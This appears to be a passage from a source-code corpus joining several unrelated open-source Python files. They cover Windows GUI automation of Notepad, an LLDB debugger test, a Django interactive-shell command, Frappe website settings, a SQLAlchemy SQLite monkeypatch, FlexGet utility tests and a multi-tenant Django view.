# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Run some automations to test things"""
from __future__ import unicode_literals
from __future__ import print_function
import os.path
import sys
import time
try:
from pywinauto import application
except ImportError:
pywinauto_path = os.path.abspath(__file__)
pywinauto_path = os.path.split(os.path.split(pywinauto_path)[0])[0]
sys.path.append(pywinauto_path)
from pywinauto import application
from pywinauto import tests
from pywinauto.findbestmatch import MatchError
from pywinauto.timings import Timings
print("Setting timings to slow settings, may be necessary for")
print("slow applications or slow machines.")
Timings.slow()
#application.set_timing(3, .5, 10, .5, .4, .2, .2, .1, .2, .5)
def run_notepad():
"""Run notepad and do some small stuff with it"""
start = time.time()
app = application.Application()
## for distribution we don't want to connect to anybodies application
## because we may mess up something they are working on!
#try:
# app.connect_(path = r"c:\windows\system32\notepad.exe")
#except application.ProcessNotFoundError:
# app.start_(r"c:\windows\system32\notepad.exe")
app.start(r"notepad.exe")
app.Notepad.menu_select("File->PageSetup")
# ----- Page Setup Dialog ----
# Select the 4th combobox item
app.PageSetupDlg.SizeComboBox.select(4)
# Select the 'Letter' combobox item or the Letter
try:
app.PageSetupDlg.SizeComboBox.select("Letter")
except ValueError:
app.PageSetupDlg.SizeComboBox.select('Letter (8.5" x 11")')
app.PageSetupDlg.SizeComboBox.select(2)
# run some tests on the Dialog. List of available tests:
# "AllControls",
# "AsianHotkey",
# "ComboBoxDroppedHeight",
# "CompareToRefFont",
# "LeadTrailSpaces",
# "MiscValues",
# "Missalignment",
# "MissingExtraString",
# "Overlapping",
# "RepeatedHotkey",
# "Translation",
# "Truncation",
bugs = app.PageSetupDlg.run_tests('RepeatedHotkey Truncation')
# if there are any bugs they will be printed to the console
# and the controls will be highlighted
tests.print_bugs(bugs)
# ----- Next Page Setup Dialog ----
app.PageSetupDlg.Printer.click()
# do some radio button clicks
# Open the Connect to printer dialog so we can
# try out checking/unchecking a checkbox
app.PageSetupDlg.Network.click()
# ----- Connect To Printer Dialog ----
# Select a checkbox
app.ConnectToPrinter.ExpandByDefault.check()
app.ConnectToPrinter.ExpandByDefault.uncheck()
# try doing the same by using click
app.ConnectToPrinter.ExpandByDefault.click()
app.ConnectToPrinter.ExpandByDefault.click()
# close the dialog
app.ConnectToPrinter.Cancel.close_click()
# ----- 2nd Page Setup Dialog again ----
app.PageSetupDlg.Properties.click()
doc_props = app.window(title_re = ".*Properties$")
doc_props.wait('exists', timeout=40)
# ----- Document Properties Dialog ----
# some tab control selections
# Two ways of selecting tabs with indices...
doc_props.TabCtrl.select(0)
doc_props.TabCtrl.select(1)
try:
doc_props.TabCtrl.select(2)
except IndexError:
# not all users have 3 tabs in this dialog
print('Skip 3rd tab selection...')
# or with text...
doc_props.TabCtrl.select("PaperQuality")
try:
doc_props.TabCtrl.select("JobRetention")
except MatchError:
# some people do not have the "Job Retention" tab
print('Skip "Job Retention" tab...')
# doc_props.TabCtrl.select("Layout")
#
# # do some radio button clicks
# doc_props.RotatedLandscape.click()
# doc_props.BackToFront.click()
# doc_props.FlipOnShortEdge.click()
#
# doc_props.Portrait.click()
# doc_props._None.click()
# doc_props.FrontToBack.click()
#
# # open the Advanced options dialog in two steps
# advbutton = doc_props.Advanced
# advbutton.click()
#
# # close the 4 windows
#
# # ----- Advanced Options Dialog ----
# app.window(title_re = ".* Advanced Options").Ok.click()
# ----- Document Properties Dialog again ----
doc_props.Cancel.close_click()
# for some reason my current printer driver
# window does not close cleanly :(
if doc_props.Cancel.Exists():
doc_props.OK.close_click()
# ----- 2nd Page Setup Dialog again ----
app.PageSetupDlg.OK.close_click()
# ----- Page Setup Dialog ----
app.PageSetupDlg.Ok.close_click()
# type some text - note that extended characters ARE allowed
app.Notepad.Edit.set_edit_text("I am typing s\xe4me text to Notepad\r\n\r\n"
"And then I am going to quit")
app.Notepad.Edit.right_click()
app.Popup.menu_item("Right To Left Reading Order").click()
#app.PopupMenu.menu_select("Paste", app.Notepad.ctrl_())
#app.Notepad.Edit.right_click()
#app.PopupMenu.menu_select("Right To Left Reading Order", app.Notepad.ctrl_())
#app.PopupMenu.menu_select("Show unicode control characters", app.Notepad.ctrl_())
#time.sleep(1)
#app.Notepad.Edit.right_click()
#app.PopupMenu.menu_select("Right To Left Reading Order", app.Notepad.ctrl_())
#time.sleep(1)
#app.Notepad.Edit.right_click()
#app.PopupMenu.menu_select("Insert Unicode control character -> IAFS", app.Notepad.ctrl_())
#time.sleep(1)
#app.Notepad.Edit.type_keys("{ESC}")
# the following shows that Sendtext does not accept
# accented characters - but does allow 'control' characters
app.Notepad.Edit.type_keys("{END}{ENTER}SendText d\xf6\xe9s "
u"s\xfcpp\xf4rt \xe0cce\xf1ted characters!!!", with_spaces = True)
# Try and save
app.Notepad.menu_select("File->SaveAs")
app.SaveAs.EncodingComboBox.select("UTF-8")
app.SaveAs.FileNameEdit.set_edit_text("Example-utf8.txt")
app.SaveAs.Save.close_click()
# my machine has a weird problem - when connected to the network
# the SaveAs Dialog appears - but doing anything with it can
# cause a LONG delay - the easiest thing is to just wait
# until the dialog is no longer active
# - Dialog might just be gone - because click worked
# - dialog might be waiting to disappear
# so can't wait for next dialog or for it to be disabled
# - dialog might be waiting to display message box so can't wait
# for it to be gone or for the main dialog to be enabled.
# while the dialog exists wait upto 30 seconds (and yes it can
# take that long on my computer sometimes :-( )
app.SaveAsDialog2.Cancel.wait_not('enabled')
# If file exists - it asks you if you want to overwrite
try:
app.SaveAs.Yes.wait('exists').close_click()
except MatchError:
print('Skip overwriting...')
# exit notepad
app.Notepad.menu_select("File->Exit")
#if not run_with_appdata:
# app.WriteAppData(os.path.join(scriptdir, "Notepad_fast.pkl"))
print("That took %.3f to run"% (time.time() - start))
if __name__ == "__main__":
run_notepad()
| vasily-v-ryabov/pywinauto | examples/notepad_slow.py | Python | bsd-3-clause | 9,099 |
"""Test that a forward-declared class works when its complete definition is in a library"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class ForwardDeclTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break inside main().
self.source = 'main.m'
self.line = line_number(self.source, '// Set breakpoint 0 here.')
self.shlib_names = ["Container"]
def do_test(self, dictionary=None):
self.build(dictionary=dictionary)
# Create a target by the debugger.
target = self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
self.assertTrue(target, VALID_TARGET)
# Create the breakpoint inside function 'main'.
breakpoint = target.BreakpointCreateByLocation(self.source, self.line)
self.assertTrue(breakpoint, VALID_BREAKPOINT)
# Register our shared libraries for remote targets so they get
# automatically uploaded
environment = self.registerSharedLibrariesWithTarget(
target, self.shlib_names)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple(
None, environment, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
# The breakpoint should have a hit count of 1.
self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
substrs=[' resolved, hit count = 1'])
# This should display correctly.
self.expect("expression [j getMember]", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["= 0x"])
@skipUnlessDarwin
def test_expr(self):
self.do_test()
@no_debug_info_test
@skipUnlessDarwin
@skipIf(compiler=no_match("clang"))
@skipIf(compiler_version=["<", "7.0"])
def test_debug_names(self):
"""Test that we are able to find complete types when using DWARF v5
accelerator tables"""
self.do_test(
dict(CFLAGS_EXTRAS="-dwarf-version=5 -mllvm -accel-tables=Dwarf"))
| endlessm/chromium-browser | third_party/llvm/lldb/test/API/lang/objc/forward-decl/TestForwardDecl.py | Python | bsd-3-clause | 2,454 |
import os
import sys
import time
import traceback
from optparse import make_option
import six
from django.conf import settings
from django.core.management.base import NoArgsCommand
from django_extensions.management.shells import import_objects
from django_extensions.management.utils import signalcommand
class Command(NoArgsCommand):
def use_vi_mode():
editor = os.environ.get('EDITOR')
if not editor:
return False
editor = os.path.basename(editor)
return editor.startswith('vi') or editor.endswith('vim')
option_list = NoArgsCommand.option_list + (
make_option('--plain', action='store_true', dest='plain',
help='Tells Django to use plain Python, not BPython nor IPython.'),
make_option('--bpython', action='store_true', dest='bpython',
help='Tells Django to use BPython, not IPython.'),
make_option('--ptpython', action='store_true', dest='ptpython',
help='Tells Django to use PTPython, not IPython.'),
make_option('--ptipython', action='store_true', dest='ptipython',
help='Tells Django to use PT-IPython, not IPython.'),
make_option('--ipython', action='store_true', dest='ipython',
help='Tells Django to use IPython, not BPython.'),
make_option('--notebook', action='store_true', dest='notebook',
help='Tells Django to use IPython Notebook.'),
make_option('--kernel', action='store_true', dest='kernel',
help='Tells Django to start an IPython Kernel.'),
make_option('--use-pythonrc', action='store_true', dest='use_pythonrc',
help='Tells Django to execute PYTHONSTARTUP file (BE CAREFULL WITH THIS!)'),
make_option('--print-sql', action='store_true', default=False,
help="Print SQL queries as they're executed"),
make_option('--dont-load', action='append', dest='dont_load', default=[],
help='Ignore autoloading of some apps/models. Can be used several times.'),
make_option('--quiet-load', action='store_true', default=False, dest='quiet_load',
help='Do not display loaded models messages'),
make_option('--vi', action='store_true', default=use_vi_mode(), dest='vi_mode',
help='Load Vi key bindings (for --ptpython and --ptipython)'),
make_option('--no-browser', action='store_true', default=False, dest='no_browser',
help='Don\'t open the notebook in a browser after startup.'),
)
help = "Like the 'shell' command but autoloads the models of all installed Django apps."
@signalcommand
def handle_noargs(self, **options):
use_kernel = options.get('kernel', False)
use_notebook = options.get('notebook', False)
use_ipython = options.get('ipython', False)
use_bpython = options.get('bpython', False)
use_plain = options.get('plain', False)
use_ptpython = options.get('ptpython', False)
use_ptipython = options.get('ptipython', False)
use_pythonrc = options.get('use_pythonrc', True)
no_browser = options.get('no_browser', False)
verbosity = int(options.get('verbosity', 1))
if options.get("print_sql", False):
# Code from http://gist.github.com/118990
try:
# Django 1.7 onwards
from django.db.backends import utils
except ImportError:
# Django 1.6 and below
from django.db.backends import util as utils
sqlparse = None
try:
import sqlparse
except ImportError:
pass
class PrintQueryWrapper(utils.CursorDebugWrapper):
def execute(self, sql, params=()):
starttime = time.time()
try:
return self.cursor.execute(sql, params)
finally:
execution_time = time.time() - starttime
raw_sql = self.db.ops.last_executed_query(self.cursor, sql, params)
if sqlparse:
print(sqlparse.format(raw_sql, reindent=True))
else:
print(raw_sql)
print("")
print('Execution time: %.6fs [Database: %s]' % (execution_time, self.db.alias))
print("")
utils.CursorDebugWrapper = PrintQueryWrapper
def get_kernel():
try:
from IPython import release
if release.version_info[0] < 2:
print(self.style.ERROR("--kernel requires at least IPython version 2.0"))
return
from IPython import embed_kernel
except ImportError:
return traceback.format_exc()
def run_kernel():
imported_objects = import_objects(options, self.style)
embed_kernel(local_ns=imported_objects)
return run_kernel
def get_notebook():
from IPython import release
try:
from IPython.html.notebookapp import NotebookApp
except ImportError:
if release.version_info[0] >= 3:
raise
try:
from IPython.frontend.html.notebook import notebookapp
NotebookApp = notebookapp.NotebookApp
except ImportError:
return traceback.format_exc()
def install_kernel_spec(app, display_name, ipython_arguments):
"""install an IPython >= 3.0 kernelspec that loads django extensions"""
ksm = app.kernel_spec_manager
ks = ksm.get_kernel_spec('python')
ks.argv.extend(ipython_arguments)
ks.display_name = display_name
manage_py_dir, manage_py = os.path.split(os.path.realpath(sys.argv[0]))
if manage_py == 'manage.py' and os.path.isdir(manage_py_dir) and manage_py_dir != os.getcwd():
pythonpath = ks.env.get('PYTHONPATH', os.environ.get('PYTHONPATH', ''))
pythonpath = pythonpath.split(':')
if manage_py_dir not in pythonpath:
pythonpath.append(manage_py_dir)
ks.env['PYTHONPATH'] = ':'.join(filter(None, pythonpath))
kernel_dir = os.path.join(ksm.user_kernel_dir, 'django_extensions')
if not os.path.exists(kernel_dir):
os.makedirs(kernel_dir)
with open(os.path.join(kernel_dir, 'kernel.json'), 'w') as f:
f.write(ks.to_json())
def run_notebook():
app = NotebookApp.instance()
# Treat IPYTHON_ARGUMENTS from settings
ipython_arguments = getattr(settings, 'IPYTHON_ARGUMENTS', [])
if 'django_extensions.management.notebook_extension' not in ipython_arguments:
ipython_arguments.extend(['--ext', 'django_extensions.management.notebook_extension'])
# Treat NOTEBOOK_ARGUMENTS from settings
notebook_arguments = getattr(settings, 'NOTEBOOK_ARGUMENTS', [])
if no_browser and '--no-browser' not in notebook_arguments:
notebook_arguments.append('--no-browser')
if '--notebook-dir' not in notebook_arguments:
notebook_arguments.extend(['--notebook-dir', '.'])
# IPython < 3 passes through kernel args from notebook CLI
if release.version_info[0] < 3:
notebook_arguments.extend(ipython_arguments)
app.initialize(notebook_arguments)
# IPython >= 3 uses kernelspecs to specify kernel CLI args
if release.version_info[0] >= 3:
display_name = getattr(settings, 'IPYTHON_KERNEL_DISPLAY_NAME', "Django Shell-Plus")
install_kernel_spec(app, display_name, ipython_arguments)
app.start()
return run_notebook
def get_plain():
# Using normal Python shell
import code
imported_objects = import_objects(options, self.style)
try:
# Try activating rlcompleter, because it's handy.
import readline
except ImportError:
pass
else:
# We don't have to wrap the following import in a 'try', because
# we already know 'readline' was imported successfully.
import rlcompleter
readline.set_completer(rlcompleter.Completer(imported_objects).complete)
readline.parse_and_bind("tab:complete")
# We want to honor both $PYTHONSTARTUP and .pythonrc.py, so follow system
# conventions and get $PYTHONSTARTUP first then import user.
if use_pythonrc:
pythonrc = os.environ.get("PYTHONSTARTUP")
if pythonrc and os.path.isfile(pythonrc):
global_ns = {}
with open(pythonrc) as rcfile:
try:
six.exec_(compile(rcfile.read(), pythonrc, 'exec'), global_ns)
imported_objects.update(global_ns)
except NameError:
pass
# This will import .pythonrc.py as a side-effect
try:
import user # NOQA
except ImportError:
pass
def run_plain():
code.interact(local=imported_objects)
return run_plain
def get_bpython():
try:
from bpython import embed
except ImportError:
return traceback.format_exc()
def run_bpython():
imported_objects = import_objects(options, self.style)
embed(imported_objects)
return run_bpython
def get_ipython():
try:
from IPython import start_ipython
def run_ipython():
imported_objects = import_objects(options, self.style)
ipython_arguments = getattr(settings, 'IPYTHON_ARGUMENTS', [])
start_ipython(argv=ipython_arguments, user_ns=imported_objects)
return run_ipython
except ImportError:
str_exc = traceback.format_exc()
# IPython < 0.11
# Explicitly pass an empty list as arguments, because otherwise
# IPython would use sys.argv from this script.
# Notebook not supported for IPython < 0.11.
try:
from IPython.Shell import IPShell
except ImportError:
return str_exc + "\n" + traceback.format_exc()
def run_ipython():
imported_objects = import_objects(options, self.style)
shell = IPShell(argv=[], user_ns=imported_objects)
shell.mainloop()
return run_ipython
def get_ptpython():
try:
from ptpython.repl import embed, run_config
except ImportError:
tb = traceback.format_exc()
try: # prompt_toolkit < v0.27
from prompt_toolkit.contrib.repl import embed, run_config
except ImportError:
return tb
def run_ptpython():
imported_objects = import_objects(options, self.style)
history_filename = os.path.expanduser('~/.ptpython_history')
embed(globals=imported_objects, history_filename=history_filename,
vi_mode=options.get('vi_mode', False), configure=run_config)
return run_ptpython
def get_ptipython():
try:
from ptpython.repl import run_config
from ptpython.ipython import embed
except ImportError:
tb = traceback.format_exc()
try: # prompt_toolkit < v0.27
from prompt_toolkit.contrib.repl import run_config
from prompt_toolkit.contrib.ipython import embed
except ImportError:
return tb
def run_ptipython():
imported_objects = import_objects(options, self.style)
history_filename = os.path.expanduser('~/.ptpython_history')
embed(user_ns=imported_objects, history_filename=history_filename,
vi_mode=options.get('vi_mode', False), configure=run_config)
return run_ptipython
def set_application_name():
"""Set the application_name on PostgreSQL connection
Use the fallback_application_name to let the user override
it with PGAPPNAME env variable
http://www.postgresql.org/docs/9.4/static/libpq-connect.html#LIBPQ-PARAMKEYWORDS # noqa
"""
supported_backends = ['django.db.backends.postgresql_psycopg2']
opt_name = 'fallback_application_name'
default_app_name = 'django_shell'
app_name = default_app_name
dbs = getattr(settings, 'DATABASES', [])
# lookup over all the databases entry
for db in dbs.keys():
if dbs[db]['ENGINE'] in supported_backends:
try:
options = dbs[db]['OPTIONS']
except KeyError:
options = {}
# dot not override a defined value
if opt_name in options.keys():
app_name = dbs[db]['OPTIONS'][opt_name]
else:
dbs[db]['OPTIONS'].update({opt_name: default_app_name})
app_name = default_app_name
return app_name
shells = (
('ptipython', get_ptipython),
('ptpython', get_ptpython),
('bpython', get_bpython),
('ipython', get_ipython),
('plain', get_plain),
)
SETTINGS_SHELL_PLUS = getattr(settings, 'SHELL_PLUS', None)
shell = None
shell_name = "any"
set_application_name()
if use_kernel:
shell = get_kernel()
shell_name = "IPython Kernel"
elif use_notebook:
shell = get_notebook()
shell_name = "IPython Notebook"
elif use_plain:
shell = get_plain()
shell_name = "plain"
elif use_ipython:
shell = get_ipython()
shell_name = "IPython"
elif use_bpython:
shell = get_bpython()
shell_name = "BPython"
elif use_ptpython:
shell = get_ptpython()
shell_name = "ptpython"
elif use_ptipython:
shell = get_ptipython()
shell_name = "ptipython"
elif SETTINGS_SHELL_PLUS:
shell_name = SETTINGS_SHELL_PLUS
shell = dict(shells)[shell_name]()
else:
for shell_name, func in shells:
shell = func()
if callable(shell):
if verbosity > 1:
print(self.style.NOTICE("Using shell %s." % shell_name))
break
if not callable(shell):
if shell:
print(shell)
print(self.style.ERROR("Could not load %s interactive Python environment." % shell_name))
return
shell()
| barseghyanartur/django-extensions | django_extensions/management/commands/shell_plus.py | Python | mit | 15,982 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import get_request_site_address, encode
from frappe.model.document import Document
from six.moves.urllib.parse import quote
from frappe.website.router import resolve_route
from frappe.website.doctype.website_theme.website_theme import add_website_theme
class WebsiteSettings(Document):
def validate(self):
self.validate_top_bar_items()
self.validate_footer_items()
self.validate_home_page()
def validate_home_page(self):
if frappe.flags.in_install:
return
if self.home_page and not resolve_route(self.home_page):
frappe.msgprint(_("Invalid Home Page") + " (Standard pages - index, login, products, blog, about, contact)")
self.home_page = ''
def validate_top_bar_items(self):
"""validate url in top bar items"""
for top_bar_item in self.get("top_bar_items"):
if top_bar_item.parent_label:
parent_label_item = self.get("top_bar_items", {"label": top_bar_item.parent_label})
if not parent_label_item:
# invalid item
frappe.throw(_("{0} does not exist in row {1}").format(top_bar_item.parent_label, top_bar_item.idx))
elif not parent_label_item[0] or parent_label_item[0].url:
# parent cannot have url
frappe.throw(_("{0} in row {1} cannot have both URL and child items").format(top_bar_item.parent_label,
top_bar_item.idx))
def validate_footer_items(self):
"""validate url in top bar items"""
for footer_item in self.get("footer_items"):
if footer_item.parent_label:
parent_label_item = self.get("footer_items", {"label": footer_item.parent_label})
if not parent_label_item:
# invalid item
frappe.throw(_("{0} does not exist in row {1}").format(footer_item.parent_label, footer_item.idx))
elif not parent_label_item[0] or parent_label_item[0].url:
# parent cannot have url
frappe.throw(_("{0} in row {1} cannot have both URL and child items").format(footer_item.parent_label,
footer_item.idx))
def on_update(self):
self.clear_cache()
def clear_cache(self):
# make js and css
# clear web cache (for menus!)
frappe.clear_cache(user = 'Guest')
from frappe.website.render import clear_cache
clear_cache()
# clears role based home pages
frappe.clear_cache()
def get_website_settings():
hooks = frappe.get_hooks()
context = frappe._dict({
'top_bar_items': get_items('top_bar_items'),
'footer_items': get_items('footer_items'),
"post_login": [
{"label": _("My Account"), "url": "/me"},
# {"class": "divider"},
{"label": _("Logout"), "url": "/?cmd=web_logout"}
]
})
settings = frappe.get_single("Website Settings")
for k in ["banner_html", "brand_html", "copyright", "twitter_share_via",
"facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup", "hide_footer_signup", "head_html", "title_prefix",
"navbar_search"]:
if hasattr(settings, k):
context[k] = settings.get(k)
if settings.address:
context["footer_address"] = settings.address
for k in ["facebook_share", "google_plus_one", "twitter_share", "linked_in_share",
"disable_signup"]:
context[k] = int(context.get(k) or 0)
if frappe.request:
context.url = quote(str(get_request_site_address(full_address=True)), safe="/:")
context.encoded_title = quote(encode(context.title or ""), str(""))
for update_website_context in hooks.update_website_context or []:
frappe.get_attr(update_website_context)(context)
context.web_include_js = hooks.web_include_js or []
context.web_include_css = hooks.web_include_css or []
via_hooks = frappe.get_hooks("website_context")
for key in via_hooks:
context[key] = via_hooks[key]
if key not in ("top_bar_items", "footer_items", "post_login") \
and isinstance(context[key], (list, tuple)):
context[key] = context[key][-1]
add_website_theme(context)
if not context.get("favicon"):
context["favicon"] = "/assets/frappe/images/favicon.png"
if settings.favicon and settings.favicon != "attach_files:":
context["favicon"] = settings.favicon
return context
def get_items(parentfield):
all_top_items = frappe.db.sql("""\
select * from `tabTop Bar Item`
where parent='Website Settings' and parentfield= %s
order by idx asc""", parentfield, as_dict=1)
top_items = [d for d in all_top_items if not d['parent_label']]
# attach child items to top bar
for d in all_top_items:
if d['parent_label']:
for t in top_items:
if t['label']==d['parent_label']:
if not 'child_items' in t:
t['child_items'] = []
t['child_items'].append(d)
break
return top_items
| StrellaGroup/frappe | frappe/website/doctype/website_settings/website_settings.py | Python | mit | 4,709 |
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import re
from buildbot.util import sautils
from sqlalchemy.engine import reflection
from sqlalchemy.dialects.sqlite.base import SQLiteDialect, _pragma_cursor
from sqlalchemy.dialects.sqlite.base import sqltypes, util
@reflection.cache
def get_columns_06x_fixed(self, connection, table_name, schema=None, **kw):
quote = self.identifier_preparer.quote_identifier
if schema is not None:
pragma = "PRAGMA %s." % quote(schema)
else:
pragma = "PRAGMA "
qtable = quote(table_name)
c = _pragma_cursor(connection.execute("%stable_info(%s)" % (pragma, qtable)))
#### found_table = False (pyflake)
columns = []
while True:
row = c.fetchone()
if row is None:
break
(name, type_, nullable, default, has_default, primary_key) = (row[1], row[2].upper(), not row[3], row[4], row[4] is not None, row[5])
name = re.sub(r'^\"|\"$', '', name)
#### if default:
#### default = re.sub(r"^\'|\'$", '', default)
match = re.match(r'(\w+)(\(.*?\))?', type_)
if match:
coltype = match.group(1)
args = match.group(2)
else:
coltype = "VARCHAR"
args = ''
try:
coltype = self.ischema_names[coltype]
except KeyError:
util.warn("Did not recognize type '%s' of column '%s'" %
(coltype, name))
coltype = sqltypes.NullType
if args is not None:
args = re.findall(r'(\d+)', args)
coltype = coltype(*[int(a) for a in args])
columns.append({
'name' : name,
'type' : coltype,
'nullable' : nullable,
'default' : default,
'primary_key': primary_key
})
return columns
@reflection.cache
def get_columns_07x_fixed(self, connection, table_name, schema=None, **kw):
quote = self.identifier_preparer.quote_identifier
if schema is not None:
pragma = "PRAGMA %s." % quote(schema)
else:
pragma = "PRAGMA "
qtable = quote(table_name)
c = _pragma_cursor(connection.execute("%stable_info(%s)" % (pragma, qtable)))
#### found_table = False (pyflake)
columns = []
while True:
row = c.fetchone()
if row is None:
break
(name, type_, nullable, default, has_default, primary_key) = (row[1], row[2].upper(), not row[3], row[4], row[4] is not None, row[5])
name = re.sub(r'^\"|\"$', '', name)
#### if default:
#### default = re.sub(r"^\'|\'$", '', default)
match = re.match(r'(\w+)(\(.*?\))?', type_)
if match:
coltype = match.group(1)
args = match.group(2)
else:
coltype = "VARCHAR"
args = ''
try:
coltype = self.ischema_names[coltype]
if args is not None:
args = re.findall(r'(\d+)', args)
coltype = coltype(*[int(a) for a in args])
except KeyError:
util.warn("Did not recognize type '%s' of column '%s'" %
(coltype, name))
coltype = sqltypes.NullType()
columns.append({
'name' : name,
'type' : coltype,
'nullable' : nullable,
'default' : default,
'autoincrement':default is None,
'primary_key': primary_key
})
return columns
def patch():
# fix for http://www.sqlalchemy.org/trac/ticket/2189, backported to 0.6.0
if sautils.sa_version()[:2] == (0, 6):
get_columns_fixed = get_columns_06x_fixed
else:
get_columns_fixed = get_columns_07x_fixed
SQLiteDialect.get_columns = get_columns_fixed
| denny820909/builder | lib/python2.7/site-packages/buildbot-0.8.8-py2.7.egg/buildbot/monkeypatches/sqlalchemy2189.py | Python | mit | 4,442 |
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from datetime import datetime
import math
import pytest
from flexget.utils import json
from flexget.utils.tools import parse_filesize, split_title_year
def compare_floats(float1, float2):
eps = 0.0001
return math.fabs(float1 - float2) <= eps
class TestJson(object):
def test_json_encode_dt(self):
date_str = '2016-03-11T17:12:17Z'
dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
encoded_dt = json.dumps(dt, encode_datetime=True)
assert encoded_dt == '"%s"' % date_str
def test_json_encode_dt_dict(self):
date_str = '2016-03-11T17:12:17Z'
dt = datetime.strptime(date_str, '%Y-%m-%dT%H:%M:%SZ')
date_obj = {'date': dt}
encoded_dt = json.dumps(date_obj, encode_datetime=True)
assert encoded_dt == '{"date": "%s"}' % date_str
def test_json_decode_dt(self):
date_str = '"2016-03-11T17:12:17Z"'
dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
decoded_dt = json.loads(date_str, decode_datetime=True)
assert dt == decoded_dt
def test_json_decode_dt_obj(self):
date_str = '"2016-03-11T17:12:17Z"'
date_obj_str = '{"date": %s}' % date_str
decoded_dt = json.loads(date_obj_str, decode_datetime=True)
dt = datetime.strptime(date_str, '"%Y-%m-%dT%H:%M:%SZ"')
assert decoded_dt == {'date': dt}
class TestParseFilesize(object):
def test_parse_filesize_no_space(self):
size = '200KB'
expected = 200 * 1000 / 1024 ** 2
assert compare_floats(parse_filesize(size), expected)
def test_parse_filesize_space(self):
size = '200.0 KB'
expected = 200 * 1000 / 1024 ** 2
assert compare_floats(parse_filesize(size), expected)
def test_parse_filesize_non_si(self):
size = '1234 GB'
expected = 1234 * 1000 ** 3 / 1024 ** 2
assert compare_floats(parse_filesize(size), expected)
def test_parse_filesize_auto(self):
size = '1234 GiB'
expected = 1234 * 1024 ** 3 / 1024 ** 2
assert compare_floats(parse_filesize(size), expected)
def test_parse_filesize_auto_mib(self):
size = '1234 MiB'
assert compare_floats(parse_filesize(size), 1234)
def test_parse_filesize_ib_not_valid(self):
with pytest.raises(ValueError):
parse_filesize('100 ib')
def test_parse_filesize_single_digit(self):
size = '1 GiB'
assert compare_floats(parse_filesize(size), 1024)
def test_parse_filesize_separators(self):
size = '1,234 GiB'
assert parse_filesize(size) == 1263616
size = '1 234 567 MiB'
assert parse_filesize(size) == 1234567
class TestSplitYearTitle(object):
@pytest.mark.parametrize('title, expected_title, expected_year', [
('The Matrix', 'The Matrix', None),
('The Matrix 1999', 'The Matrix', 1999),
('The Matrix (1999)', 'The Matrix', 1999),
('The Matrix - 1999', 'The Matrix -', 1999),
('The.Matrix.1999', 'The.Matrix.', 1999),
('The Human Centipede III (Final Sequence)', 'The Human Centipede III (Final Sequence)', None),
('The Human Centipede III (Final Sequence) (2015)', 'The Human Centipede III (Final Sequence)', 2015),
('2020', '2020', None)
])
def test_split_year_title(self, title, expected_title, expected_year):
assert split_title_year(title) == (expected_title, expected_year)
| jawilson/Flexget | flexget/tests/test_utils.py | Python | mit | 3,596 |
from customers.models import Client
from django.conf import settings
from django.db import utils
from django.views.generic import TemplateView
from tenant_schemas.utils import remove_www
class HomeView(TemplateView):
template_name = "index_public.html"
def get_context_data(self, **kwargs):
context = super(HomeView, self).get_context_data(**kwargs)
hostname_without_port = remove_www(self.request.get_host().split(':')[0])
try:
Client.objects.get(schema_name='public')
except utils.DatabaseError:
context['need_sync'] = True
context['shared_apps'] = settings.SHARED_APPS
context['tenants_list'] = []
return context
except Client.DoesNotExist:
context['no_public_tenant'] = True
context['hostname'] = hostname_without_port
if Client.objects.count() == 1:
context['only_public_tenant'] = True
context['tenants_list'] = Client.objects.all()
return context
| mcanaves/django-tenant-schemas | examples/tenant_tutorial/tenant_tutorial/views.py | Python | mit | 1,030 |
# File: C (Python 2.4)
from otp.ai.AIBaseGlobal import *
from direct.distributed.ClockDelta import *
from direct.fsm import StateData
from direct.directnotify import DirectNotifyGlobal
import random
from direct.task import Task
